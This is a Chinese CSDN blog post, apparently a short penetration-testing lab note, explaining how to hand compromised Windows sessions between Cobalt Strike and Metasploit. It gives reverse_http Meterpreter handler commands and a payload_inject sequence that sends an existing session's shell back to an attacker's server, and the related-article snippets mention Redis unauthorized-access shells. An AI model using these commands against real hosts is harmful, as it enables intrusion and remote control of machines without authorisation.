CS与MSF联动之派生会话

最新推荐文章于 2023-08-07 18:20:31 发布
最新推荐文章于 2023-08-07 18:20:31 发布
阅读量1.6k 收藏 8
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/113862910
版权
CS 派生会话到MSF

当我们CS上线后,先打开msf,启动监听模块

use exploit/multi/handler 
set payload windows/meterpreter/reverse_http
set lhost xxxx
set lport xxxx
exploit

在这里插入图片描述
然后在CS新建一个外部监听
两边的payload协议一定要对应的
在这里插入图片描述
然后选择需要派生的会话右击—>Spawn然后选择刚刚创建的监听
在这里插入图片描述

MSF 派生会话给CS

先在 cs 开启监听,Cobalt Strike->Listeners-Add,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口
在这里插入图片描述
首先msf中已有会话session 1

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http   #两边的payload协议一定要对应的
set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true
set lhost xxxx                   #cobaltstrike服务端ip
set lport xxxx                  #cobaltstrike服务端监听的端口 
set session 1                    #这里是当前获得的session的id
exploit

可以看到 cs 成功接收到 shell
在这里插入图片描述

GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3577
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听MSF监听模块设置对应端口地址 CS执行Spawn选择监听MSF->CSCS创建监听MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,...与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。   图 MSF基于组件的业务框架   (1)应用层业务组件(ASC)   这些组件通常与应用服务器有关,通过信令访问,由一系列输入输出交互准则定义。例如,基于SIP的业务交互中,相关ASC必须理解发送或接收的不同SIP消息中特定的参数。   (2)媒体服务组件(MSC)   MSC用于与媒体通路的交互,MSC大多与媒体服务器有关,包括一些功能如文本到语音的转化、交互式语音识别系统、会议桥等。   (3)数据
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4171
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Cobaltstrike系列教程(二)Listner与Payload生成
热门推荐
J0o1ey Blog
08-01 1万+
0x000-前文 Cobaltstrike系列教程(一)简介与安装 https://bbs.ichunqiu.com/thread-52937-1-1.html PS:原本想完成日更目标的,但昨天在研究无线,就没更,今天加班~ 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。 Listner(监...
p72 内网安全-域横向 CS&MSF 联动及应急响应初识
weixin_43263566的博客
05-08 645
内网安全-域横向 CS&MSF 联动及应急响应初识
Cobalt Strike(cs联动 msf
weixin_46079186的博客
11-18 3198
真实渗透场景 靶机:win2008 ip:218.77.102.x vps(cs 服务端 和 安装了msf):centos7 ip:45.76.151.x 本地(cs 客户端,连接cs ): 本地已经连接cs 并且已经上线、我们只需要连接到msf 添加监听器 点击add 添加 payload 设置为Foreign HTTP,ip 为vps 主机,设置端口 点击seav 3. 添加成功后如图 4. vps 打开msf, use exploit/multi/handler set pay
MSF恶意程序利用——CS上线
陳Huid的博客
08-07 531
申明:本篇文章的用意仅做学习使用!
CS\MSF进阶-拓展应用
weixin_51151498的博客
06-14 247
渗透框架
152.网络安全渗透测试—[Cobalt Strike系列]—[会话管理/派生]
qwsn
03-24 2464
一、会话管理 1、实验环境 2、会话派生 (1)128的cs会话派生给128的cs本身 (2)128的cs会话派生给129的cs会话 (3)128的cs会话派生到129的msf会话 (4)129的msf生成木马 + 128的cs获取新会话 (5)129的msf溢出exp发到128的cs会话 (6)129的msf会话派生给128的cs会话
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1743
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
基础电子中的MSF业务框架与IMS的关系
11-14
MSF和36PP对于在下一代网络中快速有效地进行新业务开发的需求认识是一致的,因此,MSF的业务框架和36PP IMS的业务平台之间必然存在着紧密的关系。通过对MSF业务框架和IMS业务平台的分析,可以看出MSF中的业务代理...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 3994
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
HTA(html应用程序)攻击
Zlirving_的博客
02-23 3560
HTA 介绍 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别 大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的 HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等) HTA
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 1882
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
内网渗透之隐藏隧道技术
Zlirving_的博客
05-07 1715
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
github上的信息收集
Zlirving_的博客
06-19 1575
在一个交流群上,看到有位老哥在github上找某SRC厂商的信息泄露,俗称“捡垃圾”,报上高危,换算过来赏了xxxx软妹币。有点心动? 所以今天也学习除了google hack以外的关于github上敏感信息的一些搜索语法(主要也是结合google) Github是一个分布式的版本控制系统,目前拥有上百万万开发者用户。当今大规模数据泄露事情一直在发生,从未停止过,但有些人不知道的是很多时候一些敏感信息的泄露其实是我们自己无意中造成的,然而一个小疏忽,往往却造成一系列连锁反应…… Github上敏感信息的泄露
如何让metasploit与Python联动
最新发布
09-15
可以使用 Metasploit 的 RPC 接口来实现与 Python 的联动。具体步骤如下: 1. 在 Metasploit 中启用 RPC 服务。可以在 Metasploit 的控制台中输入 `load msgrpc ServerHost=127...1 ServerPort=55553 User=test ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值